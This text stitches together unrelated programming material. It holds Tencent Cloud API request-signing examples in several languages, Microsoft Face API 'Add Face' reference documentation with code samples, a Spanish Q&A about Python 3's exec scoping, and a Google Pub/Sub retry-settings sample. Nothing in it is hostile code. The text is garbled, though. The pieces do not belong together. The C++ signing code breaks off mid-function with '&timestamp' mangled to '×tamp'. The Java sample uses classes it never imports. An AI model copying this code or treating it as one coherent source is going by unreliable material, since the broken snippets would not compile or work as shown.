$secretDate = hash_hmac("SHA256", $date, "TC3".$secretKey, true);
$secretService = hash_hmac("SHA256", $service, $secretDate, true);
$secretSigning = hash_hmac("SHA256", "tc3_request", $secretService, true);
$signature = hash_hmac("SHA256", $stringToSign, $secretSigning);
echo $signature.PHP_EOL;
// step 4: build authorization
$authorization = $algorithm
." Credential=".$secretId."/".$credentialScope
.", SignedHeaders=content-type;host, Signature=".$signature;
echo $authorization.PHP_EOL;
$curl = "curl -X POST https://".$host
.' -H "Authorization: '.$authorization.'"'
.' -H "Content-Type: application/json; charset=utf-8"'
.' -H "Host: '.$host.'"'
.' -H "X-TC-Action: '.$action.'"'
.' -H "X-TC-Timestamp: '.$timestamp.'"'
.' -H "X-TC-Version: '.$version.'"'
.' -H "X-TC-Region: '.$region.'"'
." -d '".$payload."'";
echo $curl.PHP_EOL;
# -*- coding: UTF-8 -*-
# require ruby>=2.3.0
require 'digest'
require 'json'
require 'time'
require 'openssl'
# Key Parameters
secret_id = 'AKIDz8krbsJ5yKBZQpn74WFkmLPx3*******'
secret_key = 'Gu5t9xGARNpq86cd98joQYCN3*******'
service = 'cvm'
host = 'cvm.tencentcloudapi.com'
endpoint = 'https://' + host
region = 'ap-guangzhou'
action = 'DescribeInstances'
version = '2017-03-12'
algorithm = 'TC3-HMAC-SHA256'
# timestamp = Time.now.to_i
timestamp = 1551113065
date = Time.at(timestamp).utc.strftime('%Y-%m-%d')
# ************* Step 1: Concatenate the CanonicalRequest string *************
http_request_method = 'POST'
canonical_uri = '/'
canonical_querystring = ''
canonical_headers = "content-type:application/json; charset=utf-8\nhost:#{host}\n"
signed_headers = 'content-type;host'
# params = { 'Limit' => 1, 'Filters' => [{ 'Name' => 'instance-name', 'Values' => ['unnamed'] }] }
# payload = JSON.generate(params, { 'ascii_only' => true, 'space' => ' ' })
# json will generate in random order, to get specified result in example, we hard-code it here.
payload = '{"Limit": 1, "Filters": [{"Values": ["unnamed"], "Name": "instance-name"}]}'
hashed_request_payload = Digest::SHA256.hexdigest(payload)
canonical_request = [
http_request_method,
canonical_uri,
canonical_querystring,
canonical_headers,
signed_headers,
hashed_request_payload,
].join("\n")
puts canonical_request
# ************* Step 2: Concatenate the string to sign *************
credential_scope = date + '/' + service + '/' + 'tc3_request'
hashed_request_payload = Digest::SHA256.hexdigest(canonical_request)
string_to_sign = [
algorithm,
timestamp.to_s,
credential_scope,
hashed_request_payload,
].join("\n")
puts string_to_sign
# ************* Step 3: Calculate the Signature *************
digest = OpenSSL::Digest.new('sha256')
secret_date = OpenSSL::HMAC.digest(digest, 'TC3' + secret_key, date)
secret_service = OpenSSL::HMAC.digest(digest, secret_date, service)
secret_signing = OpenSSL::HMAC.digest(digest, secret_service, 'tc3_request')
signature = OpenSSL::HMAC.hexdigest(digest, secret_signing, string_to_sign)
puts signature
# ************* Step 4: Concatenate the Authorization *************
authorization = "#{algorithm} Credential=#{secret_id}/#{credential_scope}, SignedHeaders=#{signed_headers}, Signature=#{signature}"
puts authorization
puts 'curl -X POST ' + endpoint \
+ ' -H "Authorization: ' + authorization + '"' \
+ ' -H "Content-Type: application/json; charset=utf-8"' \
+ ' -H "Host: ' + host + '"' \
+ ' -H "X-TC-Action: ' + action + '"' \
+ ' -H "X-TC-Timestamp: ' + timestamp.to_s + '"' \
+ ' -H "X-TC-Version: ' + version + '"' \
+ ' -H "X-TC-Region: ' + region + '"' \
+ " -d '" + payload + "'"
using System;
using System.Collections.Generic;
using System.Security.Cryptography;
using System.Text;
public class Application
{
public static string SHA256Hex(string s)
{
using (SHA256 algo = SHA256.Create())
{
byte[] hashbytes = algo.ComputeHash(Encoding.UTF8.GetBytes(s));
StringBuilder builder = new StringBuilder();
for (int i = 0; i < hashbytes.Length; ++i)
{
builder.Append(hashbytes[i].ToString("x2"));
}
return builder.ToString();
}
}
public static byte[] HmacSHA256(byte[] key, byte[] msg)
{
using (HMACSHA256 mac = new HMACSHA256(key))
{
return mac.ComputeHash(msg);
}
}
public static Dictionary<String, String> BuildHeaders(string secretid,
string secretkey, string service, string endpoint, string region,
string action, string version, DateTime date, string requestPayload)
{
string datestr = date.ToString("yyyy-MM-dd");
DateTime startTime = new DateTime(1970, 1, 1, 0, 0, 0, 0, DateTimeKind.Utc);
long requestTimestamp = (long)Math.Round((date - startTime).TotalMilliseconds, MidpointRounding.AwayFromZero) / 1000;
// ************* Step 1: Concatenate the CanonicalRequest string *************
string algorithm = "TC3-HMAC-SHA256";
string httpRequestMethod = "POST";
string canonicalUri = "/";
string canonicalQueryString = "";
string contentType = "application/json";
string canonicalHeaders = "content-type:" + contentType + "; charset=utf-8\n" + "host:" + endpoint + "\n";
string signedHeaders = "content-type;host";
string hashedRequestPayload = SHA256Hex(requestPayload);
string canonicalRequest = httpRequestMethod + "\n"
+ canonicalUri + "\n"
+ canonicalQueryString + "\n"
+ canonicalHeaders + "\n"
+ signedHeaders + "\n"
+ hashedRequestPayload;
Console.WriteLine(canonicalRequest);
Console.WriteLine("----------------------------------");
// ************ Step 2: Concatenate the string to sign *************
string credentialScope = datestr + "/" + service + "/" + "tc3_request";
string hashedCanonicalRequest = SHA256Hex(canonicalRequest);
string stringToSign = algorithm + "\n" + requestTimestamp.ToString() + "\n" + credentialScope + "\n" + hashedCanonicalRequest;
Console.WriteLine(stringToSign);
Console.WriteLine("----------------------------------");
// ************* Step 3: Calculate the signature *************
byte[] tc3SecretKey = Encoding.UTF8.GetBytes("TC3" + secretkey);
byte[] secretDate = HmacSHA256(tc3SecretKey, Encoding.UTF8.GetBytes(datestr));
byte[] secretService = HmacSHA256(secretDate, Encoding.UTF8.GetBytes(service));
byte[] secretSigning = HmacSHA256(secretService, Encoding.UTF8.GetBytes("tc3_request"));
byte[] signatureBytes = HmacSHA256(secretSigning, Encoding.UTF8.GetBytes(stringToSign));
string signature = BitConverter.ToString(signatureBytes).Replace("-", "").ToLower();
Console.WriteLine(signature);
Console.WriteLine("----------------------------------");
// ************* Step 4: Concatenate the Authorization *************
string authorization = algorithm + " "
+ "Credential=" + secretid + "/" + credentialScope + ", "
+ "SignedHeaders=" + signedHeaders + ", "
+ "Signature=" + signature;
Console.WriteLine(authorization);
Console.WriteLine("----------------------------------");
Dictionary<string, string> headers = new Dictionary<string, string>();
headers.Add("Authorization", authorization);
headers.Add("Host", endpoint);
headers.Add("Content-Type", contentType + "; charset=utf-8");
headers.Add("X-TC-Timestamp", requestTimestamp.ToString());
headers.Add("X-TC-Version", version);
headers.Add("X-TC-Action", action);
headers.Add("X-TC-Region", region);
return headers;
}
public static void Main(string[] args)
{
// SecretID and SecretKey
string SECRET_ID = "AKIDz8krbsJ5yKBZQpn74WFkmLPx3*******";
string SECRET_KEY = "Gu5t9xGARNpq86cd98joQYCN3*******";
string service = "cvm";
string endpoint = "cvm.tencentcloudapi.com";
string region = "ap-guangzhou";
string action = "DescribeInstances";
string version = "2017-03-12";
// The timestamp `2019-02-26 00:44:25` used here is only for reference. In a project, use the following parameter:
// DateTime date = DateTime.UtcNow;
// Enter the correct time zone. We recommend using UTC timestamp to avoid errors.
DateTime date = new DateTime(1970, 1, 1, 0, 0, 0, 0, DateTimeKind.Utc).AddSeconds(1551113065);
string requestPayload = "{\"Limit\": 1, \"Filters\": [{\"Values\": [\"\\u672a\\u547d\\u540d\"], \"Name\": \"instance-name\"}]}";
Dictionary<string, string> headers = BuildHeaders(SECRET_ID, SECRET_KEY, service
, endpoint, region, action, version, date, requestPayload);
Console.WriteLine("POST https://cvm.tencentcloudapi.com");
foreach (KeyValuePair<string, string> kv in headers)
{
Console.WriteLine(kv.Key + ": " + kv.Value);
}
Console.WriteLine();
Console.WriteLine(requestPayload);
}
}
const crypto = require('crypto');
function sha256(message, secret = '', encoding) {
const hmac = crypto.createHmac('sha256', secret)
return hmac.update(message).digest(encoding)
}
function getHash(message, encoding = 'hex') {
const hash = crypto.createHash('sha256')
return hash.update(message).digest(encoding)
}
function getDate(timestamp) {
const date = new Date(timestamp * 1000)
const year = date.getUTCFullYear()
const month = ('0' + (date.getUTCMonth() + 1)).slice(-2)
const day = ('0' + date.getUTCDate()).slice(-2)
return `${year}-${month}-${day}`
}
function main(){
const SECRET_ID = "AKIDz8krbsJ5yKBZQpn74WFkmLPx3*******"
const SECRET_KEY = "Gu5t9xGARNpq86cd98joQYCN3*******"
const endpoint = "cvm.tencentcloudapi.com"
const service = "cvm"
const region = "ap-guangzhou"
const action = "DescribeInstances"
const version = "2017-03-12"
//const timestamp = getTime()
const timestamp = 1551113065
const date = getDate(timestamp)
// ************* Step 1: Concatenate the CanonicalRequest string *************
const signedHeaders = "content-type;host"
const payload = "{\"Limit\": 1, \"Filters\": [{\"Values\": [\"unnamed\"], \"Name\": \"instance-name\"}]}"
const hashedRequestPayload = getHash(payload);
const httpRequestMethod = "POST"
const canonicalUri = "/"
const canonicalQueryString = ""
const canonicalHeaders = "content-type:application/json; charset=utf-8\n" + "host:" + endpoint + "\n"
const canonicalRequest = httpRequestMethod + "\n"
+ canonicalUri + "\n"
+ canonicalQueryString + "\n"
+ canonicalHeaders + "\n"
+ signedHeaders + "\n"
+ hashedRequestPayload
console.log(canonicalRequest)
console.log("----------------------------")
// ************* Step 2: Concatenate the string to sign *************
const algorithm = "TC3-HMAC-SHA256"
const hashedCanonicalRequest = getHash(canonicalRequest);
const credentialScope = date + "/" + service + "/" + "tc3_request"
const stringToSign = algorithm + "\n" +
timestamp + "\n" +
credentialScope + "\n" +
hashedCanonicalRequest
console.log(stringToSign)
console.log("----------------------------")
// ************* Step 3: Calculate the signature *************
const kDate = sha256(date, 'TC3' + SECRET_KEY)
const kService = sha256(service, kDate)
const kSigning = sha256('tc3_request', kService)
const signature = sha256(stringToSign, kSigning, 'hex')
console.log(signature)
console.log("----------------------------")
// ************* Step 4: Concatenate the Authorization *************
const authorization = algorithm + " " +
"Credential=" + SECRET_ID + "/" + credentialScope + ", " +
"SignedHeaders=" + signedHeaders + ", " +
"Signature=" + signature
console.log(authorization)
console.log("----------------------------")
const Call_Information = 'curl -X POST ' + "https://" + endpoint
+ ' -H "Authorization: ' + authorization + '"'
+ ' -H "Content-Type: application/json; charset=utf-8"'
+ ' -H "Host: ' + endpoint + '"'
+ ' -H "X-TC-Action: ' + action + '"'
+ ' -H "X-TC-Timestamp: ' + timestamp.toString() + '"'
+ ' -H "X-TC-Version: ' + version + '"'
+ ' -H "X-TC-Region: ' + region + '"'
+ " -d '" + payload + "'"
console.log(Call_Information)
}
main()
#include <iostream>
#include <iomanip>
#include <sstream>
#include <string>
#include <stdio.h>
#include <time.h>
#include <openssl/sha.h>
#include <openssl/hmac.h>
using namespace std;
string get_data(int64_t ×tamp)
{
string utcDate;
char buff[20] = {0};
// time_t timenow;
struct tm sttime;
sttime = *gmtime(×tamp);
strftime(buff, sizeof(buff), "%Y-%m-%d", &sttime);
utcDate = string(buff);
return utcDate;
}
string int2str(int64_t n)
{
std::stringstream ss;
ss << n;
return ss.str();
}
string sha256Hex(const string &str)
{
char buf[3];
unsigned char hash[SHA256_DIGEST_LENGTH];
SHA256_CTX sha256;
SHA256_Init(&sha256);
SHA256_Update(&sha256, str.c_str(), str.size());
SHA256_Final(hash, &sha256);
std::string NewString = "";
for(int i = 0; i < SHA256_DIGEST_LENGTH; i++)
{
snprintf(buf, sizeof(buf), "%02x", hash[i]);
NewString = NewString + buf;
}
return NewString;
}
string HmacSha256(const string &key, const string &input)
{
unsigned char hash[32];
HMAC_CTX *h;
#if OPENSSL_VERSION_NUMBER < 0x10100000L
HMAC_CTX hmac;
HMAC_CTX_init(&hmac);
h = &hmac;
#else
h = HMAC_CTX_new();
#endif
HMAC_Init_ex(h, &key[0], key.length(), EVP_sha256(), NULL);
HMAC_Update(h, ( unsigned char* )&input[0], input.length());
unsigned int len = 32;
HMAC_Final(h, hash, &len);
#if OPENSSL_VERSION_NUMBER < 0x10100000L
HMAC_CTX_cleanup(h);
#else
HMAC_CTX_free(h);
#endif
std::stringstream ss;
ss << std::setfill('0');
|
Face API - v1.0
This API is currently available in:
Australia East - australiaeast.api.cognitive.microsoft.com
Brazil South - brazilsouth.api.cognitive.microsoft.com
Canada Central - canadacentral.api.cognitive.microsoft.com
Central India - centralindia.api.cognitive.microsoft.com
Central US - centralus.api.cognitive.microsoft.com
East Asia - eastasia.api.cognitive.microsoft.com
East US - eastus.api.cognitive.microsoft.com
East US 2 - eastus2.api.cognitive.microsoft.com
France Central - francecentral.api.cognitive.microsoft.com
Japan East - japaneast.api.cognitive.microsoft.com
Japan West - japanwest.api.cognitive.microsoft.com
Korea Central - koreacentral.api.cognitive.microsoft.com
North Central US - northcentralus.api.cognitive.microsoft.com
North Europe - northeurope.api.cognitive.microsoft.com
South Africa North - southafricanorth.api.cognitive.microsoft.com
South Central US - southcentralus.api.cognitive.microsoft.com
Southeast Asia - southeastasia.api.cognitive.microsoft.com
UK South - uksouth.api.cognitive.microsoft.com
West Central US - westcentralus.api.cognitive.microsoft.com
West Europe - westeurope.api.cognitive.microsoft.com
West US - westus.api.cognitive.microsoft.com
West US 2 - westus2.api.cognitive.microsoft.com
UAE North - uaenorth.api.cognitive.microsoft.com
PersonGroup Person - Add Face
Add a face to a person into a person group for face identification or verification. To deal with an image containingmultiple faces, input face can be specified as an image with a targetFace rectangle. It returns a persistedFaceId representing theadded face. No image will be stored. Only the extracted face feature(s) will be stored on server untilPersonGroup PersonFace - Delete,PersonGroup Person - Delete orPersonGroup - Delete is called.
Note persistedFaceId is different from faceId generated byFace - Detect.
Higher face image quality means better recognition precision. Please consider high-quality faces: frontal, clear, and face size is 200x200 pixels (100 pixels between eyes) or bigger.
Each person entry can hold up to 248 faces.
JPEG, PNG, GIF (the first frame), and BMP format are supported. The allowed image file size is from 1KB to 6MB.
"targetFace" rectangle should contain one face. Zero or multiple faces will be regarded as an error. If the provided "targetFace" rectangle is not returned from Face - Detect, there’s no guarantee to detect and add the face successfully.
Out of detectable face size (36x36 - 4096x4096 pixels), large head-pose, or large occlusions will cause failures.
Adding/deleting faces to/from a same person will be processed sequentially. Adding/deleting faces to/from different persons are processed in parallel.
The minimum detectable face size is 36x36 pixels in an image no larger than 1920x1080 pixels. Images with dimensions higher than 1920x1080 pixels will need a proportionally larger minimum face size.
Different 'detectionModel' values can be provided. To use and compare different detection models, please refer to How to specify a detection model
'detection_01': The default detection model for PersonGroup Person - Add Face. Recommend for near frontal face detection. For scenarios with exceptionally large angle (head-pose) faces, occluded faces or wrong image orientation, the faces in such cases may not be detected.
'detection_02': Detection model released in 2019 May with improved accuracy especially on small, side and blurry faces.
Http Method
POST
Select the testing console in the region where you created your resource:
West US West US 2 East US East US 2 West Central US South Central US West Europe North Europe Southeast Asia East Asia Australia East Brazil South Canada Central Central India UK South Japan East Central US France Central Korea Central Japan West North Central US South Africa North UAE North
Request URL
Request parameters
Specifying the person group containing the target person.
Target person that the face is added to.
User-specified data about the target face to add for any purpose. The maximum length is 1KB.
A face rectangle to specify the target face to be added to a person, in the format of "targetFace=left,top,width,height". E.g. "targetFace=10,10,100,100". If there is more than one face in the image, targetFace is required to specify which face to add. No targetFace means there is only one face detected in the entire image.
The 'detectionModel' associated with the detected faceIds. Supported 'detectionModel' values include "detection_01" or "detection_02". The default value is "detection_01".
Request headers
Request body
JSON fields in request body:
Fields Type Description
url String Face image URL. Valid image size is from 1KB to 6MB. Only one face is allowed per image.
{
"url": "http://example.com/1.jpg"
}
{
[binary data]
}
Response 200
A successful call returns the new persistedFaceId.
JSON fields in response body:
Fields Type Description
persistedFaceId String persistedFaceId of the added face, which is persisted and will not expire. Different from faceId which is created in Face - Detect and will expire in 24 hours after the detection call.
{
"persistedFaceId": "B8D802CF-DD8F-4E61-B15C-9E6C5844CCBA"
}
Response 400
Error code and message returned in JSON:
Error Code Error Message Description
BadArgument 'userData' is too long.
BadArgument Invalid request body.
BadArgument Argument targetFace out of range, targetFace is valid but it's intersection with the entire image is empty.
BadArgument Invalid argument targetFace. Caused by invalid string format or invalid left/top/height/width value.
BadArgument 'detectionModel' is invalid.
InvalidImage Decoding error, image format unsupported.
InvalidImage No face detected in the image or in the specified targetFace area.
InvalidImage There is more than 1 face in the image or in the specified targetFace area.
InvalidImageSize Image size is too small.
InvalidImageSize Image size is too big.
InvalidURL Invalid image URL.
InvalidURL Failed to download from target server. Remote server error returned.
{
"error": {
"code": "BadArgument",
"message": "Request body is invalid."
}
}
Response 401
Error code and message returned in JSON:
Error Code Error Message Description
Unspecified Invalid subscription Key or user/plan is blocked.
{
"error": {
"code": "Unspecified",
"message": "Access denied due to invalid subscription key. Make sure you are subscribed to an API you are trying to call and provide the right key."
}
}
Response 403
Persisted face number reached limit, maximum is 248 per person.
{
"error": {
"code": "QuotaExceeded",
"message": "Persisted face number reached limit."
}
}
Response 404
Error code and message returned in JSON:
Error Code Error Message Description
PersonGroupNotFound Person group ID is invalid. Valid format should be a string composed by numbers, English letters in lower case, '-', '_', and no longer than 64 characters.
PersonGroupNotFound Person group is not found.
PersonNotFound Person ID is invalid.
PersonNotFound Person is not found.
{
"error": {
"code": "PersonGroupNotFound",
"message": "Person group is not found."
}
}
Response 408
{
"error": {
"code": "OperationTimeOut",
"message": "Request Timeout."
}
}
Response 409
Error code and message returned in JSON:
Error Code Error Message Description
PersonGroupTrainingNotFinished The person group is still under training. Try again after training completed.
ConcurrentOperationConflict Concurrent operation conflict on requested resource.
{
"error": {
"code": "PersonGroupTrainingNotFinished",
"message": "Person group is under training."
}
}
Response 415
Unsupported media type error. Content-Type is not in the allowed types:
For an image URL, Content-Type should be application/json
For a local image, Content-Type should be application/octet-stream
{
"error": {
"code": "BadArgument",
"message": "Invalid Media Type."
}
}
Response 429
{
"error": {
"statusCode": 429,
"message": "Rate limit is exceeded. Try again in 26 seconds."
}
}
Code samples
@ECHO OFF
curl -v -X POST "https://northeurope.api.cognitive.microsoft.com/face/v1.0/persongroups/{personGroupId}/persons/{personId}/persistedFaces?userData={string}&targetFace={string}&detectionModel=detection_01"
-H "Content-Type: application/json"
-H "Ocp-Apim-Subscription-Key: {subscription key}"
--data-ascii "{body}"
using System;
using System.Net.Http.Headers;
using System.Text;
using System.Net.Http;
using System.Web;
namespace CSHttpClientSample
{
static class Program
{
static void Main()
{
MakeRequest();
Console.WriteLine("Hit ENTER to exit...");
Console.ReadLine();
}
static async void MakeRequest()
{
var client = new HttpClient();
var queryString = HttpUtility.ParseQueryString(string.Empty);
// Request headers
client.DefaultRequestHeaders.Add("Ocp-Apim-Subscription-Key", "{subscription key}");
// Request parameters
queryString["userData"] = "{string}";
queryString["targetFace"] = "{string}";
queryString["detectionModel"] = "detection_01";
var uri = "https://northeurope.api.cognitive.microsoft.com/face/v1.0/persongroups/{personGroupId}/persons/{personId}/persistedFaces?" + queryString;
HttpResponseMessage response;
// Request body
byte[] byteData = Encoding.UTF8.GetBytes("{body}");
using (var content = new ByteArrayContent(byteData))
{
content.Headers.ContentType = new MediaTypeHeaderValue("< your content type, i.e. application/json >");
response = await client.PostAsync(uri, content);
}
}
}
}
// // This sample uses the Apache HTTP client from HTTP Components (http://hc.apache.org/httpcomponents-client-ga/)
import java.net.URI;
import org.apache.http.HttpEntity;
import org.apache.http.HttpResponse;
import org.apache.http.client.HttpClient;
import org.apache.http.client.methods.HttpGet;
import org.apache.http.client.utils.URIBuilder;
import org.apache.http.impl.client.HttpClients;
import org.apache.http.util.EntityUtils;
public class JavaSample
{
public static void main(String[] args)
{
HttpClient httpclient = HttpClients.createDefault();
try
{
URIBuilder builder = new URIBuilder("https://northeurope.api.cognitive.microsoft.com/face/v1.0/persongroups/{personGroupId}/persons/{personId}/persistedFaces");
builder.setParameter("userData", "{string}");
builder.setParameter("targetFace", "{string}");
builder.setParameter("detectionModel", "detection_01");
URI uri = builder.build();
HttpPost request = new HttpPost(uri);
request.setHeader("Content-Type", "application/json");
request.setHeader("Ocp-Apim-Subscription-Key", "{subscription key}");
// Request body
StringEntity reqEntity = new StringEntity("{body}");
request.setEntity(reqEntity);
HttpResponse response = httpclient.execute(request);
HttpEntity entity = response.getEntity();
if (entity != null)
{
System.out.println(EntityUtils.toString(entity));
}
}
catch (Exception e)
{
System.out.println(e.getMessage());
}
}
}
<!DOCTYPE html>
<html>
<head>
<title>JSSample</title>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.9.0/jquery.min.js"></script>
</head>
<body>
<script type="text/javascript">
$(function() {
var params = {
// Request parameters
"userData": "{string}",
"targetFace": "{string}",
"detectionModel": "detection_01",
};
$.ajax({
url: "https://northeurope.api.cognitive.microsoft.com/face/v1.0/persongroups/{personGroupId}/persons/{personId}/persistedFaces?" + $.param(params),
beforeSend: function(xhrObj){
// Request headers
xhrObj.setRequestHeader("Content-Type","application/json");
xhrObj.setRequestHeader("Ocp-Apim-Subscription-Key","{subscription key}");
},
type: "POST",
// Request body
data: "{body}",
})
.done(function(data) {
alert("success");
})
.fail(function() {
alert("error");
});
});
</script>
</body>
</html>
#import <Foundation/Foundation.h>
int main(int argc, const char * argv[])
{
NSAutoreleasePool * pool = [[NSAutoreleasePool alloc] init];
NSString* path = @"https://northeurope.api.cognitive.microsoft.com/face/v1.0/persongroups/{personGroupId}/persons/{personId}/persistedFaces";
NSArray* array = @[
// Request parameters
@"entities=true",
@"userData={string}",
@"targetFace={string}",
@"detectionModel=detection_01",
];
NSString* string = [array componentsJoinedByString:@"&"];
path = [path stringByAppendingFormat:@"?%@", string];
NSLog(@"%@", path);
NSMutableURLRequest* _request = [NSMutableURLRequest requestWithURL:[NSURL URLWithString:path]];
[_request setHTTPMethod:@"POST"];
// Request headers
[_request setValue:@"application/json" forHTTPHeaderField:@"Content-Type"];
[_request setValue:@"{subscription key}" forHTTPHeaderField:@"Ocp-Apim-Subscription-Key"];
// Request body
[_request setHTTPBody:[@"{body}" dataUsingEncoding:NSUTF8StringEncoding]];
NSURLResponse *response = nil;
NSError *error = nil;
NSData* _connectionData = [NSURLConnection sendSynchronousRequest:_request returningResponse:&response error:&error];
if (nil != error)
{
NSLog(@"Error: %@", error);
}
else
{
NSError* error = nil;
NSMutableDictionary* json = nil;
NSString* dataString = [[NSString alloc] initWithData:_connectionData encoding:NSUTF8StringEncoding];
NSLog(@"%@", dataString);
if (nil != _connectionData)
{
json = [NSJSONSerialization JSONObjectWithData:_connectionData options:NSJSONReadingMutableContainers error:&error];
}
if (error || !json)
{
NSLog(@"Could not parse loaded json with error:%@", error);
}
NSLog(@"%@", json);
_connectionData = nil;
}
[pool drain];
return 0;
}
<?php
// This sample uses the Apache HTTP client from HTTP Components (http://hc.apache.org/httpcomponents-client-ga/)
require_once 'HTTP/Request2.php';
$request = new Http_Request2('https://northeurope.api.cognitive.microsoft.com/face/v1.0/persongroups/{personGroupId}/persons/{personId}/persistedFaces');
$url = $request->getUrl();
$headers = array(
// Request headers
'Content-Type' => 'application/json',
'Ocp-Apim-Subscription-Key' => '{subscription key}',
);
$request->setHeader($headers);
$parameters = array(
// Request parameters
'userData' => '{string}',
'targetFace' => '{string}',
'detectionModel' => 'detection_01',
);
$url->setQueryVariables($parameters);
$request->setMethod(HTTP_Request2::METHOD_POST);
// Request body
$request->setBody("{body}");
try
{
$response = $request->send();
echo $response->getBody();
}
catch (HttpException $ex)
{
echo $ex;
}
?>
########### Python 2.7 #############
import httplib, urllib, base64
headers = {
# Request headers
'Content-Type': 'application/json',
'Ocp-Apim-Subscription-Key': '{subscription key}',
}
params = urllib.urlencode({
# Request parameters
'userData': '{string}',
'targetFace': '{string}',
'detectionModel': 'detection_01',
})
try:
conn = httplib.HTTPSConnection('northeurope.api.cognitive.microsoft.com')
conn.request("POST", "/face/v1.0/persongroups/{personGroupId}/persons/{personId}/persistedFaces?%s" % params, "{body}", headers)
response = conn.getresponse()
data = response.read()
print(data)
conn.close()
except Exception as e:
print("[Errno {0}] {1}".format(e.errno, e.strerror))
####################################
########### Python 3.2 #############
import http.client, urllib.request, urllib.parse, urllib.error, base64
headers = {
# Request headers
'Content-Type': 'application/json',
'Ocp-Apim-Subscription-Key': '{subscription key}',
}
params = urllib.parse.urlencode({
# Request parameters
'userData': '{string}',
'targetFace': '{string}',
'detectionModel': 'detection_01',
})
try:
conn = http.client.HTTPSConnection('northeurope.api.cognitive.microsoft.com')
conn.request("POST", "/face/v1.0/persongroups/{personGroupId}/persons/{personId}/persistedFaces?%s" % params, "{body}", headers)
response = conn.getresponse()
data = response.read()
print(data)
conn.close()
except Exception as e:
print("[Errno {0}] {1}".format(e.errno, e.strerror))
####################################
require 'net/http'
uri = URI('https://northeurope.api.cognitive.microsoft.com/face/v1.0/persongroups/{personGroupId}/persons/{personId}/persistedFaces')
uri.query = URI.encode_www_form({
# Request parameters
'userData' => '{string}',
'targetFace' => '{string}',
'detectionModel' => 'detection_01'
})
request = Net::HTTP::Post.new(uri.request_uri)
# Request headers
request['Content-Type'] = 'application/json'
# Request headers
request['Ocp-Apim-Subscription-Key'] = '{subscription key}'
# Request body
request.body = "{body}"
response = Net::HTTP.start(uri.host, uri.port, :use_ssl => uri.scheme == 'https') do |http|
http.request(request)
end
puts response.body
|
# Python 2.6: prints 'it is working' # Python 3.1.2: "NameError: global name 'a_func' is not defined" class Testing(object): def __init__(self): exec("""def a_func(): print('it is working')""") a_func() Testing()
# Python 2.6: prints 'it is working' # Python 3.1.2: prints 'it is working' class Testing(object): def __init__(self): def a_func(): print('it is working') a_func() Testing()
Como la definición de la función estándar funciona en ambas versiones de Python, asumo que el problema debe ser un cambio en la forma en que funciona exec. Leí los documentos API para 2.6 y 3 para exec y también leí la página “What’s New In Python 3.0” y no pude ver ninguna razón por la que el código se rompiera.
Puede ver el código de bytes generado para cada versión de Python con:
>>> from dis import dis
Y, para cada intérprete:
#Python 3.2 >>> dis(Testing.__init__) ... 5 10 LOAD_GLOBAL 1 (a_func) ... #Python 2.7 >>> dis(Testing.__init__) ... 5 8 LOAD_NAME 0 (a_func) ...
Como puede ver, Python 3.2 busca un valor global (LOAD_GLOBAL) denominado a_func y 2.7 primero busca el ámbito local (LOAD_NAME) antes de buscar el global.
Si print(locals()) después del exec , verá que a_func se crea dentro de la función __init__ .
Realmente no sé por qué se hace de esa manera, pero parece ser un cambio en cómo se procesan las tablas de símbolos .
Por cierto, si desea crear un a_func = None encima de su método __init__ para que el intérprete sepa que es una variable local, no funcionará ya que el LOAD_FAST byte ahora será LOAD_FAST y eso no hace una búsqueda pero recibe directamente Valor de una lista.
La única solución que veo es agregar globals() como segundo argumento a exec , de modo que se cree a_func como una función global y se puede acceder mediante el LOAD_GLOBAL operación LOAD_GLOBAL .
Editar
Si elimina la statement exec , Python2.7 cambia el bytecode de LOAD_NAME a LOAD_GLOBAL . Entonces, usando exec , su código siempre será más lento en Python2.x porque tiene que buscar cambios en el ámbito local.
Como el exec de Python3 no es una palabra clave, el intérprete no puede estar seguro de si realmente está ejecutando un nuevo código o haciendo otra cosa … Por lo tanto, el código de bytes no cambia.
P.ej
>>> exec = len >>> exec([1,2,3]) 3
tl; dr
exec('...', globals()) puede resolver el problema si no le importa que el resultado se agregue al espacio de nombres global
Completando la respuesta anterior, por si acaso. Si el exec está en alguna función, recomendaría usar la versión de tres argumentos de la siguiente manera:
def f(): d = {} exec("def myfunc(): ...", globals(), d) d["myfunc"]()
Esta es la solución más limpia, ya que no modifica ningún espacio de nombres bajo tus pies. En su lugar, myfunc se almacena en el diccionario explícito d .
|
Applies retry delay and/or retry timeout settings on the publisher client or publish requests.
Documentation pages that include this code sample
To view the code sample used in context, see the following documentation:
Code Sample
C#
using Google.Api.Gax.Grpc;
using Google.Cloud.PubSub.V1;
using Grpc.Core;
using System;
using System.Threading.Tasks;
public class PublishMessageWithRetrySettingsAsyncSample
{
public async Task PublishMessageWithRetrySettingsAsync(string projectId, string topicId, string messageText)
{
TopicName topicName = TopicName.FromProjectTopic(projectId, topicId);
// Retry settings control how the publisher handles retry-able failures
var maxAttempts = 3;
var initialBackoff = TimeSpan.FromMilliseconds(110); // default: 100 ms
var maxBackoff = TimeSpan.FromSeconds(70); // default : 60 seconds
var backoffMultiplier = 1.3; // default: 1.0
var totalTimeout = TimeSpan.FromSeconds(100); // default: 600 seconds
var publisher = await PublisherClient.CreateAsync(topicName,
clientCreationSettings: new PublisherClient.ClientCreationSettings(
publisherServiceApiSettings: new PublisherServiceApiSettings
{
PublishSettings = CallSettings.FromRetry(RetrySettings.FromExponentialBackoff(
maxAttempts: maxAttempts,
initialBackoff: initialBackoff,
maxBackoff: maxBackoff,
backoffMultiplier: backoffMultiplier,
retryFilter: RetrySettings.FilterForStatusCodes(StatusCode.Unavailable)))
.WithTimeout(totalTimeout)
}
)).ConfigureAwait(false);
string message = await publisher.PublishAsync(messageText);
Console.WriteLine($"Published message {message}");
}
}
C++
namespace pubsub = google::cloud::pubsub;
using google::cloud::future;
using google::cloud::StatusOr;
[](std::string project_id, std::string topic_id) {
auto topic = pubsub::Topic(std::move(project_id), std::move(topic_id));
// By default a publisher will retry for 60 seconds, with an initial backoff
// of 100ms, a maximum backoff of 60 seconds, and the backoff will grow by
// 30% after each attempt. This changes those defaults.
auto publisher = pubsub::Publisher(pubsub::MakePublisherConnection(
std::move(topic), pubsub::PublisherOptions{}, {},
pubsub::LimitedTimeRetryPolicy(
/*maximum_duration=*/std::chrono::minutes(10))
.clone(),
pubsub::ExponentialBackoffPolicy(
/*initial_delay=*/std::chrono::milliseconds(200),
/*maximum_delay=*/std::chrono::seconds(45),
/*scaling=*/2.0)
.clone()));
std::vector<future<bool>> done;
for (char const* data : {"1", "2", "3", "go!"}) {
done.push_back(
publisher.Publish(pubsub::MessageBuilder().SetData(data).Build())
.then([](future<StatusOr<std::string>> f) {
return f.get().ok();
}));
}
